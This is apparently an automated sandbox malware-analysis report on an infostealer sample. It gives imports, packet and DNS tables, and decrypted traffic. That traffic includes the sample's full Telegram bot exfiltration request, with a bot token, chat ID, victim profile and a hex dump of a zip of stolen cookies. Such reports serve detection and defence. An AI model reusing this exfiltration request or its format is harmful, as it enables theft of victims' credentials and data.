                                                                                        ntdll.dllRtlNtStatusToDosError, NtCreateFile, NtDeviceIoControlFile, NtCancelIoFileEx
                                                                                        secur32.dllEncryptMessage, FreeContextBuffer, DeleteSecurityContext, FreeCredentialsHandle, DecryptMessage, AcquireCredentialsHandleA, AcceptSecurityContext, InitializeSecurityContextW, QueryContextAttributesW, ApplyControlToken
                                                                                        VCRUNTIME140.dll__C_specific_handler, memcmp, memset, __CxxFrameHandler3, __current_exception_context, __current_exception, memcpy, strrchr, memmove
                                                                                        api-ms-win-crt-string-l1-1-0.dllstrcmp, strlen, strncmp, strcspn
                                                                                        api-ms-win-crt-utility-l1-1-0.dll_rotl64, qsort
                                                                                        api-ms-win-crt-heap-l1-1-0.dllmalloc, free, realloc, _set_new_mode, _msize
                                                                                        api-ms-win-crt-time-l1-1-0.dll_localtime64_s
                                                                                        api-ms-win-crt-math-l1-1-0.dll_dclass, log, __setusermatherr
                                                                                        api-ms-win-crt-runtime-l1-1-0.dll_endthreadex, _seh_filter_exe, _beginthreadex, _register_onexit_function, _configure_narrow_argv, _initialize_narrow_environment, _get_initial_narrow_environment, _initterm, _initterm_e, _crt_atexit, exit, _exit, _register_thread_local_exe_atexit_callback, __p___argc, terminate, _c_exit, _initialize_onexit_table, _set_app_type, __p___argv, _cexit
                                                                                        api-ms-win-crt-stdio-l1-1-0.dll_set_fmode, __p__commode
                                                                                        api-ms-win-crt-locale-l1-1-0.dll_configthreadlocale

                                                                                        Network Behavior

                                                                                        Network Port Distribution

                                                                                        TCP Packets

                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                        Mar 8, 2023 11:35:01.564877987 CET49696443192.168.2.3195.201.57.90
                                                                                        Mar 8, 2023 11:35:01.564946890 CET44349696195.201.57.90192.168.2.3
                                                                                        Mar 8, 2023 11:35:01.565059900 CET49696443192.168.2.3195.201.57.90
                                                                                        Mar 8, 2023 11:35:01.588732958 CET49696443192.168.2.3195.201.57.90
                                                                                        Mar 8, 2023 11:35:01.588798046 CET44349696195.201.57.90192.168.2.3
                                                                                        Mar 8, 2023 11:35:01.680190086 CET44349696195.201.57.90192.168.2.3
                                                                                        Mar 8, 2023 11:35:01.680385113 CET49696443192.168.2.3195.201.57.90
                                                                                        Mar 8, 2023 11:35:01.685432911 CET49696443192.168.2.3195.201.57.90
                                                                                        Mar 8, 2023 11:35:01.685471058 CET44349696195.201.57.90192.168.2.3
                                                                                        Mar 8, 2023 11:35:01.685801029 CET44349696195.201.57.90192.168.2.3
                                                                                        Mar 8, 2023 11:35:01.736849070 CET49696443192.168.2.3195.201.57.90
                                                                                        Mar 8, 2023 11:35:01.967782021 CET49696443192.168.2.3195.201.57.90
                                                                                        Mar 8, 2023 11:35:01.967876911 CET44349696195.201.57.90192.168.2.3
                                                                                        Mar 8, 2023 11:35:01.991972923 CET44349696195.201.57.90192.168.2.3
                                                                                        Mar 8, 2023 11:35:01.992142916 CET44349696195.201.57.90192.168.2.3
                                                                                        Mar 8, 2023 11:35:01.992260933 CET49696443192.168.2.3195.201.57.90
                                                                                        Mar 8, 2023 11:35:01.996000051 CET49696443192.168.2.3195.201.57.90
                                                                                        Mar 8, 2023 11:35:01.996030092 CET44349696195.201.57.90192.168.2.3
                                                                                        Mar 8, 2023 11:35:01.996205091 CET49696443192.168.2.3195.201.57.90
                                                                                        Mar 8, 2023 11:35:01.996212959 CET44349696195.201.57.90192.168.2.3
                                                                                        Mar 8, 2023 11:35:12.128074884 CET49699443192.168.2.3149.154.167.220
                                                                                        Mar 8, 2023 11:35:12.128166914 CET44349699149.154.167.220192.168.2.3
                                                                                        Mar 8, 2023 11:35:12.128359079 CET49699443192.168.2.3149.154.167.220
                                                                                        Mar 8, 2023 11:35:12.129517078 CET49699443192.168.2.3149.154.167.220
                                                                                        Mar 8, 2023 11:35:12.129565954 CET44349699149.154.167.220192.168.2.3
                                                                                        Mar 8, 2023 11:35:12.206129074 CET44349699149.154.167.220192.168.2.3
                                                                                        Mar 8, 2023 11:35:12.206279039 CET49699443192.168.2.3149.154.167.220
                                                                                        Mar 8, 2023 11:35:12.209291935 CET49699443192.168.2.3149.154.167.220
                                                                                        Mar 8, 2023 11:35:12.209321022 CET44349699149.154.167.220192.168.2.3
                                                                                        Mar 8, 2023 11:35:12.209738970 CET44349699149.154.167.220192.168.2.3
                                                                                        Mar 8, 2023 11:35:12.253287077 CET49699443192.168.2.3149.154.167.220
                                                                                        Mar 8, 2023 11:35:12.313499928 CET49699443192.168.2.3149.154.167.220
                                                                                        Mar 8, 2023 11:35:12.313579082 CET44349699149.154.167.220192.168.2.3
                                                                                        Mar 8, 2023 11:35:12.314048052 CET49699443192.168.2.3149.154.167.220
                                                                                        Mar 8, 2023 11:35:12.314095020 CET44349699149.154.167.220192.168.2.3
                                                                                        Mar 8, 2023 11:35:12.314302921 CET49699443192.168.2.3149.154.167.220
                                                                                        Mar 8, 2023 11:35:12.314337969 CET49699443192.168.2.3149.154.167.220
                                                                                        Mar 8, 2023 11:35:12.314790964 CET44349699149.154.167.220192.168.2.3
                                                                                        Mar 8, 2023 11:35:12.315027952 CET49699443192.168.2.3149.154.167.220
                                                                                        Mar 8, 2023 11:35:12.315064907 CET44349699149.154.167.220192.168.2.3
                                                                                        Mar 8, 2023 11:35:12.315114975 CET49699443192.168.2.3149.154.167.220
                                                                                        Mar 8, 2023 11:35:12.315140963 CET44349699149.154.167.220192.168.2.3
                                                                                        Mar 8, 2023 11:35:12.315181017 CET49699443192.168.2.3149.154.167.220
                                                                                        Mar 8, 2023 11:35:12.315217972 CET49699443192.168.2.3149.154.167.220
                                                                                        Mar 8, 2023 11:35:12.315217972 CET49699443192.168.2.3149.154.167.220
                                                                                        Mar 8, 2023 11:35:12.315224886 CET44349699149.154.167.220192.168.2.3
                                                                                        Mar 8, 2023 11:35:12.315248966 CET44349699149.154.167.220192.168.2.3
                                                                                        Mar 8, 2023 11:35:12.315259933 CET49699443192.168.2.3149.154.167.220
                                                                                        Mar 8, 2023 11:35:12.315283060 CET44349699149.154.167.220192.168.2.3
                                                                                        Mar 8, 2023 11:35:12.315397978 CET49699443192.168.2.3149.154.167.220
                                                                                        Mar 8, 2023 11:35:12.315429926 CET44349699149.154.167.220192.168.2.3
                                                                                        Mar 8, 2023 11:35:12.315483093 CET49699443192.168.2.3149.154.167.220
                                                                                        Mar 8, 2023 11:35:12.315501928 CET44349699149.154.167.220192.168.2.3
                                                                                        Mar 8, 2023 11:35:12.315534115 CET49699443192.168.2.3149.154.167.220
                                                                                        Mar 8, 2023 11:35:12.315562010 CET44349699149.154.167.220192.168.2.3
                                                                                        Mar 8, 2023 11:35:12.315577984 CET49699443192.168.2.3149.154.167.220
                                                                                        Mar 8, 2023 11:35:12.315613985 CET44349699149.154.167.220192.168.2.3
                                                                                        Mar 8, 2023 11:35:12.315618038 CET49699443192.168.2.3149.154.167.220
                                                                                        Mar 8, 2023 11:35:12.315639019 CET44349699149.154.167.220192.168.2.3
                                                                                        Mar 8, 2023 11:35:12.315661907 CET49699443192.168.2.3149.154.167.220
                                                                                        Mar 8, 2023 11:35:12.315676928 CET44349699149.154.167.220192.168.2.3
                                                                                        Mar 8, 2023 11:35:12.315712929 CET49699443192.168.2.3149.154.167.220
                                                                                        Mar 8, 2023 11:35:12.315730095 CET44349699149.154.167.220192.168.2.3
                                                                                        Mar 8, 2023 11:35:12.315758944 CET49699443192.168.2.3149.154.167.220
                                                                                        Mar 8, 2023 11:35:12.315787077 CET44349699149.154.167.220192.168.2.3
                                                                                        Mar 8, 2023 11:35:12.315960884 CET49699443192.168.2.3149.154.167.220
                                                                                        Mar 8, 2023 11:35:12.315985918 CET44349699149.154.167.220192.168.2.3
                                                                                        Mar 8, 2023 11:35:12.316034079 CET49699443192.168.2.3149.154.167.220
                                                                                        Mar 8, 2023 11:35:12.316051006 CET44349699149.154.167.220192.168.2.3
                                                                                        Mar 8, 2023 11:35:12.316082001 CET49699443192.168.2.3149.154.167.220
                                                                                        Mar 8, 2023 11:35:12.316101074 CET44349699149.154.167.220192.168.2.3
                                                                                        Mar 8, 2023 11:35:12.316154003 CET49699443192.168.2.3149.154.167.220
                                                                                        Mar 8, 2023 11:35:12.316170931 CET44349699149.154.167.220192.168.2.3
                                                                                        Mar 8, 2023 11:35:12.316216946 CET49699443192.168.2.3149.154.167.220
                                                                                        Mar 8, 2023 11:35:12.316232920 CET44349699149.154.167.220192.168.2.3
                                                                                        Mar 8, 2023 11:35:12.316256046 CET49699443192.168.2.3149.154.167.220
                                                                                        Mar 8, 2023 11:35:12.316268921 CET44349699149.154.167.220192.168.2.3
                                                                                        Mar 8, 2023 11:35:12.316303968 CET49699443192.168.2.3149.154.167.220
                                                                                        Mar 8, 2023 11:35:12.316322088 CET44349699149.154.167.220192.168.2.3
                                                                                        Mar 8, 2023 11:35:12.316365004 CET49699443192.168.2.3149.154.167.220
                                                                                        Mar 8, 2023 11:35:12.316382885 CET44349699149.154.167.220192.168.2.3
                                                                                        Mar 8, 2023 11:35:12.316420078 CET49699443192.168.2.3149.154.167.220
                                                                                        Mar 8, 2023 11:35:12.316435099 CET44349699149.154.167.220192.168.2.3
                                                                                        Mar 8, 2023 11:35:12.316481113 CET49699443192.168.2.3149.154.167.220
                                                                                        Mar 8, 2023 11:35:12.316498995 CET44349699149.154.167.220192.168.2.3
                                                                                        Mar 8, 2023 11:35:12.316581011 CET49699443192.168.2.3149.154.167.220
                                                                                        Mar 8, 2023 11:35:12.316601992 CET44349699149.154.167.220192.168.2.3
                                                                                        Mar 8, 2023 11:35:12.316643000 CET49699443192.168.2.3149.154.167.220
                                                                                        Mar 8, 2023 11:35:12.316659927 CET44349699149.154.167.220192.168.2.3
                                                                                        Mar 8, 2023 11:35:12.316699028 CET49699443192.168.2.3149.154.167.220
                                                                                        Mar 8, 2023 11:35:12.316715956 CET44349699149.154.167.220192.168.2.3
                                                                                        Mar 8, 2023 11:35:12.316749096 CET49699443192.168.2.3149.154.167.220
                                                                                        Mar 8, 2023 11:35:12.316766024 CET44349699149.154.167.220192.168.2.3
                                                                                        Mar 8, 2023 11:35:12.316812992 CET49699443192.168.2.3149.154.167.220
                                                                                        Mar 8, 2023 11:35:12.316828012 CET44349699149.154.167.220192.168.2.3
                                                                                        Mar 8, 2023 11:35:12.316911936 CET49699443192.168.2.3149.154.167.220
                                                                                        Mar 8, 2023 11:35:12.316940069 CET44349699149.154.167.220192.168.2.3
                                                                                        Mar 8, 2023 11:35:12.316983938 CET49699443192.168.2.3149.154.167.220
                                                                                        Mar 8, 2023 11:35:12.317007065 CET44349699149.154.167.220192.168.2.3
                                                                                        Mar 8, 2023 11:35:12.317040920 CET49699443192.168.2.3149.154.167.220
                                                                                        Mar 8, 2023 11:35:12.317064047 CET44349699149.154.167.220192.168.2.3
                                                                                        Mar 8, 2023 11:35:12.317114115 CET49699443192.168.2.3149.154.167.220
                                                                                        Mar 8, 2023 11:35:12.317137003 CET44349699149.154.167.220192.168.2.3
                                                                                        Mar 8, 2023 11:35:12.317280054 CET49699443192.168.2.3149.154.167.220
                                                                                        Mar 8, 2023 11:35:12.317300081 CET44349699149.154.167.220192.168.2.3
                                                                                        Mar 8, 2023 11:35:12.317336082 CET49699443192.168.2.3149.154.167.220
                                                                                        Mar 8, 2023 11:35:12.317413092 CET49699443192.168.2.3149.154.167.220
                                                                                        Mar 8, 2023 11:35:12.317450047 CET49699443192.168.2.3149.154.167.220
                                                                                        Mar 8, 2023 11:35:12.317519903 CET49699443192.168.2.3149.154.167.220
                                                                                        Mar 8, 2023 11:35:12.317601919 CET49699443192.168.2.3149.154.167.220
                                                                                        Mar 8, 2023 11:35:12.317640066 CET49699443192.168.2.3149.154.167.220
                                                                                        Mar 8, 2023 11:35:12.317727089 CET49699443192.168.2.3149.154.167.220
                                                                                        Mar 8, 2023 11:35:12.317802906 CET49699443192.168.2.3149.154.167.220
                                                                                        Mar 8, 2023 11:35:12.358733892 CET44349699149.154.167.220192.168.2.3
                                                                                        Mar 8, 2023 11:35:12.359158039 CET49699443192.168.2.3149.154.167.220
                                                                                        Mar 8, 2023 11:35:12.359225035 CET49699443192.168.2.3149.154.167.220
                                                                                        Mar 8, 2023 11:35:12.359348059 CET49699443192.168.2.3149.154.167.220
                                                                                        Mar 8, 2023 11:35:12.359438896 CET49699443192.168.2.3149.154.167.220
                                                                                        Mar 8, 2023 11:35:12.359564066 CET49699443192.168.2.3149.154.167.220
                                                                                        Mar 8, 2023 11:35:12.359682083 CET49699443192.168.2.3149.154.167.220
                                                                                        Mar 8, 2023 11:35:12.359832048 CET49699443192.168.2.3149.154.167.220
                                                                                        Mar 8, 2023 11:35:12.359983921 CET49699443192.168.2.3149.154.167.220
                                                                                        Mar 8, 2023 11:35:12.367558956 CET44349699149.154.167.220192.168.2.3
                                                                                        Mar 8, 2023 11:35:12.368407965 CET49699443192.168.2.3149.154.167.220
                                                                                        Mar 8, 2023 11:35:12.368441105 CET44349699149.154.167.220192.168.2.3
                                                                                        Mar 8, 2023 11:35:12.368587971 CET49699443192.168.2.3149.154.167.220
                                                                                        Mar 8, 2023 11:35:12.368726015 CET49699443192.168.2.3149.154.167.220
                                                                                        Mar 8, 2023 11:35:12.368861914 CET49699443192.168.2.3149.154.167.220
                                                                                        Mar 8, 2023 11:35:12.369071960 CET49699443192.168.2.3149.154.167.220
                                                                                        Mar 8, 2023 11:35:12.369173050 CET49699443192.168.2.3149.154.167.220
                                                                                        Mar 8, 2023 11:35:12.369337082 CET49699443192.168.2.3149.154.167.220
                                                                                        Mar 8, 2023 11:35:12.369420052 CET49699443192.168.2.3149.154.167.220
                                                                                        Mar 8, 2023 11:35:12.369471073 CET49699443192.168.2.3149.154.167.220
                                                                                        Mar 8, 2023 11:35:12.369515896 CET49699443192.168.2.3149.154.167.220
                                                                                        Mar 8, 2023 11:35:12.394120932 CET44349699149.154.167.220192.168.2.3
                                                                                        Mar 8, 2023 11:35:12.396074057 CET49699443192.168.2.3149.154.167.220
                                                                                        Mar 8, 2023 11:35:12.396121979 CET44349699149.154.167.220192.168.2.3
                                                                                        Mar 8, 2023 11:35:12.396159887 CET49699443192.168.2.3149.154.167.220
                                                                                        Mar 8, 2023 11:35:12.396184921 CET49699443192.168.2.3149.154.167.220
                                                                                        Mar 8, 2023 11:35:12.396222115 CET49699443192.168.2.3149.154.167.220
                                                                                        Mar 8, 2023 11:35:12.396250010 CET49699443192.168.2.3149.154.167.220
                                                                                        Mar 8, 2023 11:35:12.396344900 CET49699443192.168.2.3149.154.167.220
                                                                                        Mar 8, 2023 11:35:12.396372080 CET49699443192.168.2.3149.154.167.220
                                                                                        Mar 8, 2023 11:35:12.396506071 CET49699443192.168.2.3149.154.167.220
                                                                                        Mar 8, 2023 11:35:12.396579981 CET49699443192.168.2.3149.154.167.220
                                                                                        Mar 8, 2023 11:35:12.420949936 CET44349699149.154.167.220192.168.2.3
                                                                                        Mar 8, 2023 11:35:12.423341990 CET49699443192.168.2.3149.154.167.220
                                                                                        Mar 8, 2023 11:35:12.423397064 CET44349699149.154.167.220192.168.2.3
                                                                                        Mar 8, 2023 11:35:12.423422098 CET49699443192.168.2.3149.154.167.220
                                                                                        Mar 8, 2023 11:35:12.423460960 CET44349699149.154.167.220192.168.2.3
                                                                                        Mar 8, 2023 11:35:13.410718918 CET44349699149.154.167.220192.168.2.3
                                                                                        Mar 8, 2023 11:35:13.410912037 CET44349699149.154.167.220192.168.2.3
                                                                                        Mar 8, 2023 11:35:13.411010981 CET49699443192.168.2.3149.154.167.220
                                                                                        Mar 8, 2023 11:35:13.411447048 CET49699443192.168.2.3149.154.167.220
                                                                                        Mar 8, 2023 11:35:13.411494970 CET44349699149.154.167.220192.168.2.3
                                                                                        Mar 8, 2023 11:35:13.411551952 CET49699443192.168.2.3149.154.167.220
                                                                                        Mar 8, 2023 11:35:13.411571980 CET44349699149.154.167.220192.168.2.3

                                                                                        UDP Packets

                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                        Mar 8, 2023 11:35:01.528939962 CET5892153192.168.2.38.8.8.8
                                                                                        Mar 8, 2023 11:35:01.558727980 CET53589218.8.8.8192.168.2.3
                                                                                        Mar 8, 2023 11:35:12.109570026 CET4997753192.168.2.38.8.8.8
                                                                                        Mar 8, 2023 11:35:12.126470089 CET53499778.8.8.8192.168.2.3

                                                                                        DNS Queries

                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                        Mar 8, 2023 11:35:01.528939962 CET192.168.2.38.8.8.80x40e4Standard query (0)ipwho.isA (IP address)IN (0x0001)false
                                                                                        Mar 8, 2023 11:35:12.109570026 CET192.168.2.38.8.8.80xbef8Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false

                                                                                        DNS Answers

                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                        Mar 8, 2023 11:35:01.558727980 CET8.8.8.8192.168.2.30x40e4No error (0)ipwho.is195.201.57.90A (IP address)IN (0x0001)false
                                                                                        Mar 8, 2023 11:35:12.126470089 CET8.8.8.8192.168.2.30xbef8No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false

                                                                                        HTTP Request Dependency Graph

                                                                                        • ipwho.is
                                                                                        • api.telegram.org

                                                                                        HTTPS Proxied Packets

                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        0192.168.2.349696195.201.57.90443C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        2023-03-08 10:35:01 UTC0OUTGET / HTTP/1.1
                                                                                        accept: */*
                                                                                        host: ipwho.is
                                                                                        2023-03-08 10:35:01 UTC0INHTTP/1.1 200 OK
                                                                                        Date: Wed, 08 Mar 2023 10:35:01 GMT
                                                                                        Content-Type: application/json; charset=utf-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        Server: ipwhois
                                                                                        Access-Control-Allow-Headers: *
                                                                                        X-Robots-Tag: noindex
                                                                                        2023-03-08 10:35:01 UTC0INData Raw: 32 62 66 0d 0a 7b 22 69 70 22 3a 22 31 30 32 2e 31 32 39 2e 31 34 33 2e 33 39 22 2c 22 73 75 63 63 65 73 73 22 3a 74 72 75 65 2c 22 74 79 70 65 22 3a 22 49 50 76 34 22 2c 22 63 6f 6e 74 69 6e 65 6e 74 22 3a 22 45 75 72 6f 70 65 22 2c 22 63 6f 6e 74 69 6e 65 6e 74 5f 63 6f 64 65 22 3a 22 45 55 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 53 77 69 74 7a 65 72 6c 61 6e 64 22 2c 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 43 48 22 2c 22 72 65 67 69 6f 6e 22 3a 22 5a 75 67 22 2c 22 72 65 67 69 6f 6e 5f 63 6f 64 65 22 3a 22 5a 47 22 2c 22 63 69 74 79 22 3a 22 48 5c 75 30 30 66 63 6e 65 6e 62 65 72 67 22 2c 22 6c 61 74 69 74 75 64 65 22 3a 34 37 2e 31 37 37 31 39 33 36 2c 22 6c 6f 6e 67 69 74 75 64 65 22 3a 38 2e 34 32 37 31 38 36 35 2c 22 69 73 5f 65 75 22 3a 66
                                                                                        Data Ascii: 2bf{"ip":"102.129.143.39","success":true,"type":"IPv4","continent":"Europe","continent_code":"EU","country":"Switzerland","country_code":"CH","region":"Zug","region_code":"ZG","city":"H\u00fcnenberg","latitude":47.1771936,"longitude":8.4271865,"is_eu":f


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        1192.168.2.349699149.154.167.220443C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        2023-03-08 10:35:12 UTC0OUTGET /bot5749635914:AAHO1FmA3UVCNqptBOADqQF-cFGUoMOYe6g/sendDocument?chat_id=5493937924&caption=%0A-%20IP%20Info%20-%0A%0AIP:%20102.129.143.39%0ACountry:%20Switzerland%0ACity:%20H%C3%BCnenberg%0APostal:%206331%0AISP:%20Datacamp%20Limited%20-%20A212238%0ATimezone:%20+01:00%0A%0A-%20PC%20Info%20-%0A%0AOS:%20Microsoft%20Windows%2010%20Pro%0ACPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%20%0A%20%20%20%20-%207LYK_YVW%20(1280,%201024)%0AHWID:%207277006835843898%0ACurrent%20Language:%20English%20(United%20States)%0AFileLocation:%20C:\Users\user\Desktop\SecuriteInfo.com.Variant.Tedy.308647.10806.1440.exe%0AIs%20Elevated:%20true%0A%0A-%20Other%20Info%20-%0A%0AAntivirus:%20%0A%20%20%20%20-%20Windows%20Defender%0A%0A-%20Log%20Info%20-%0A%0APasswords:%20%E2%9D%8C%0ACookies:%20%E2%9C%85%201%0AWallets:%20%E2%9D%8C%0AFiles:%20%E2%9C%85%2024%0ACredit%20Cards:%20%E2%9D%8C&parse_mode=HTML HTTP/1.1
                                                                                        content-type: multipart/form-data; boundary=8e592a10a4a7a8a7-ddc2ad71fc5343ff-7197ea3cc88c5fb3-22b6fba439d0139b
                                                                                        content-length: 1148236
                                                                                        accept: */*
                                                                                        host: api.telegram.org
                                                                                        2023-03-08 10:35:12 UTC2OUTData Raw: 2d 2d 38 65 35 39 32 61 31 30 61 34 61 37 61 38 61 37 2d 64 64 63 32 61 64 37 31 66 63 35 33 34 33 66 66 2d 37 31 39 37 65 61 33 63 63 38 38 63 35 66 62 33 2d 32 32 62 36 66 62 61 34 33 39 64 30 31 33 39 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 68 61 72 64 7a 5b 31 30 32 2e 31 32 39 2e 31 34 33 2e 33 39 5d 2e 7a 69 70 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 7a 69 70 0d 0a 0d 0a 50 4b 03 04 14 00 00 00 00 00 65 5c 68 56 91 6c 7d ca 4f 00 00 00 4f 00 00 00 1a 00 00 00 63 6f 6f 6b 69 65 73 5f 67 6f 6f 67 6c 65 5f 64 65 66 61 75 6c 74 2e 74 78 74 6f 67 73 2e 67 6f 6f 67
                                                                                        Data Ascii: --8e592a10a4a7a8a7-ddc2ad71fc5343ff-7197ea3cc88c5fb3-22b6fba439d0139bContent-Disposition: form-data; name="document"; filename="user[102.129.143.39].zip"Content-Type: application/zipPKe\hVl}OOcookies_google_default.txtogs.goog
                                                                                        2023-03-08 10:35:12 UTC16OUTData Raw: 27 6e 4b 87 c9 8f 0d cb 80 8b 24 00 cf fd f0 87 e9 cc f7 4d 91 04 20 db 04 c8 ec b8 c3 d7 9e 4f 7c 05 d7 c3 5f 13 96 00 f4 6c 0d ac 94 17 0d dd 5b 94 a6 57 cc 0b b0 7d c0 b6 c2 0b 80 ef ff 74 7c c9 fa 2a 8d b4 52 14 26 fd b6 05 28 f4 b5 e5 69 ab 07 00 c7 a7 44 1d 4b 9e a8 03 a8 f8 95 c5 37 5e 15 fa f5 00 d6 c8 1f 11 34 f9 00 68 e7 57 79 6c 46 a2 bb 0d db ce bf 4a aa 17 83 55 24 1b 37 bc dd 3a f8 73 04 da f3 68 fc 34 ad a3 bb 0b 48 f7 67 d2 4f af 5b 02 b0 2e ee 80 66 bb 63 7e a0 e0 89 71 6a a2 b6 40 41 ab b0 e4 bc 13 74 4a 5f 6e c3 e7 1f 60 75 a8 bf 80 b2 7f 44 46 52 af 20 5a 14 c0 ea 30 a4 91 a0 26 1f 18 1e af e2 1d 2e 1f a5 79 ed fe ad 1a d3 34 b9 08 02 94 d2 c2 2c bd ed 6b 0d 14 34 01 de 83 c7 b4 01 9d 22 b9 05 0a 59 3c 2c 5d 55 7c bc b1 3b 5a 3b 3f 22
                                                                                        Data Ascii: 'nK$M O|_l[W}t|*R&(iDK7^4hWylFJU$7:sh4HgO[.fc~qj@AtJ_n`uDFR Z0&.y4,k4"Y<,]U|;Z;?"
                                                                                        2023-03-08 10:35:12 UTC32OUTData Raw: 50 5e 78 43 af 15 60 d7 3d 8e 17 c5 8f b2 ad 4a 00 8e 52 47 93 ac c1 12 80 19 bb 2d 73 a2 6d 2b f7 59 d2 67 6e 9f 12 bc 63 20 39 f0 53 d6 31 01 c4 cc 80 5d 1b ee 12 21 cd df 77 24 80 ed 18 5d e4 7d 1c dc 62 2d 3c b7 db ed 25 16 da 50 bb 7d b6 44 e5 e4 73 06 b9 84 6a 0d 10 3b 54 4e 5b a6 14 bd c8 91 22 32 04 2f 45 fa 5c 26 3b 01 08 f8 1e e7 f7 b8 8a f5 63 d3 d2 97 ce 23 8d ed 06 8d 6c 31 cc b1 fc 98 26 c6 1b a6 21 aa 58 7e 2c 4a f4 39 1a 20 f4 9d 90 96 e2 5a 80 53 ac 00 e0 7d 02 c6 2a b9 c7 a4 98 c1 28 2a 7d 01 8d 64 01 56 5f 04 2e 0d 73 ff e5 f4 ee 79 50 a2 b4 00 c0 c9 75 7a 73 7e 8b 36 35 e0 68 cc c8 55 d1 8b 46 95 0f 80 04 af 13 91 6c d4 00 d8 fd b7 a0 71 2f fc 26 51 54 40 ed a6 2b 63 3b 4f 65 17 48 6d 89 ed 92 b8 14 86 00 2e 80 96 45 f9 35 01 15 cb c9
                                                                                        Data Ascii: P^xC`=JRG-sm+Ygnc 9S1]!w$]}b-<%P}Dsj;TN["2/E\&;c#l1&!X~,J9 ZS}*(*}dV_.syPuzs~65hUFlq/&QT@+c;OeHm.E5
                                                                                        2023-03-08 10:35:12 UTC48OUTData Raw: cd e3 7d f2 5f f7 82 67 70 ed 1f d0 04 3a 54 c4 d5 df ab 36 3c 45 13 80 b7 0e fb 45 fc 6b ce 22 1f ff 9f bf 2d 17 fc c4 13 54 de 27 e5 25 f7 55 5f bf 43 7d 6f 7b 8c fa e2 ec 49 eb 3a 96 a9 3e b5 f8 e5 9e c8 a2 6b 53 be f5 a7 25 59 27 84 6f 3d 52 e7 eb c9 7b 09 40 9d 26 5e e1 7d 9a cd a4 00 9c 48 91 de c1 3f a1 12 c1 40 02 50 a6 7c b8 6e 03 dd 98 ae 40 e6 2a c0 db b7 e3 09 40 6a 8f 5f 22 cc 0e c2 af 47 05 f0 fe bf 5e 26 00 c3 d8 dd 74 8f 7d 03 ca 11 4d bf 01 de af 53 39 ae 2f 09 40 fa 03 50 df 84 0d 0b d8 22 48 96 0a 72 8d 89 37 60 98 61 ce 1e 34 51 e5 08 99 9e 5b 1c c5 c2 dd 7b b7 76 af 31 3a a3 68 5c c3 46 93 db 0d 78 4c 0d ee 98 f5 96 e3 15 34 ed 32 bb bc 19 d3 78 0a 54 90 7c 5c 05 a2 35 40 e3 e3 db 5e fd 55 d3 cd 7f 61 9e 1c 9d c1 5c 67 87 6e 8d fe e0
                                                                                        Data Ascii: }_gp:T6<EEk"-T'%U_C}o{I:>kS%Y'o=R{@&^}H?@P|n@*@j_"G^&t}MS9/@P"Hr7`a4Q[{v1:h\FxL42xT|\5@^Ua\gn
                                                                                        2023-03-08 10:35:12 UTC64OUTData Raw: ff a4 fc e1 5e 59 c2 00 7e 8c 4d e5 45 a7 c4 b3 ca 5a 00 30 78 46 2a ea 39 4a c0 9a af 36 69 0e e0 fd be aa cc 9d b0 71 55 db 4a 7c c0 f6 8e 77 c1 6f 00 06 c5 e6 1b ab 03 78 b0 8a c3 3f e7 03 d2 d8 1d 14 54 41 02 7e fc b9 6c 23 cf 9f cb 39 1d 50 b0 21 da 33 99 00 a4 ac 12 1f e1 56 00 6f 07 fb 31 ed c6 13 80 54 c0 12 d9 c8 6e 5b 72 f8 76 bd 1e 99 1e 1b 77 e5 9c 19 fb 3f f6 8b b3 97 32 8c df 01 0a 37 d2 14 c0 83 a0 48 e6 50 02 90 32 00 3f 6f b9 6d 6d df 8d 6b 1d 27 7a f9 d4 55 2a c0 30 5e 7f 7a 54 62 6b 61 ad 9d 2d 64 5e 03 18 d6 bf b6 fc e0 ba f8 39 0c 50 27 4b df d6 40 ae 88 70 6e 70 b4 da b5 6b 66 3c 40 33 04 c6 ba 4a dd 8c 3c ff ab 32 63 bb 63 a2 92 fd 31 ad e1 03 6c 2f 01 c8 17 f8 72 ac c4 6e 4d db c1 79 29 b0 eb 01 9d c0 75 03 bc 93 3a dc b2 8d b0 a7
                                                                                        Data Ascii: ^Y~MEZ0xF*9J6iqUJ|wox?TA~l#9P!3Vo1Tn[rvw?27HP2?ommk'zU*0^zTbka-d^9P'K@pnpkf<@3J<2cc1l/rnMy)u:
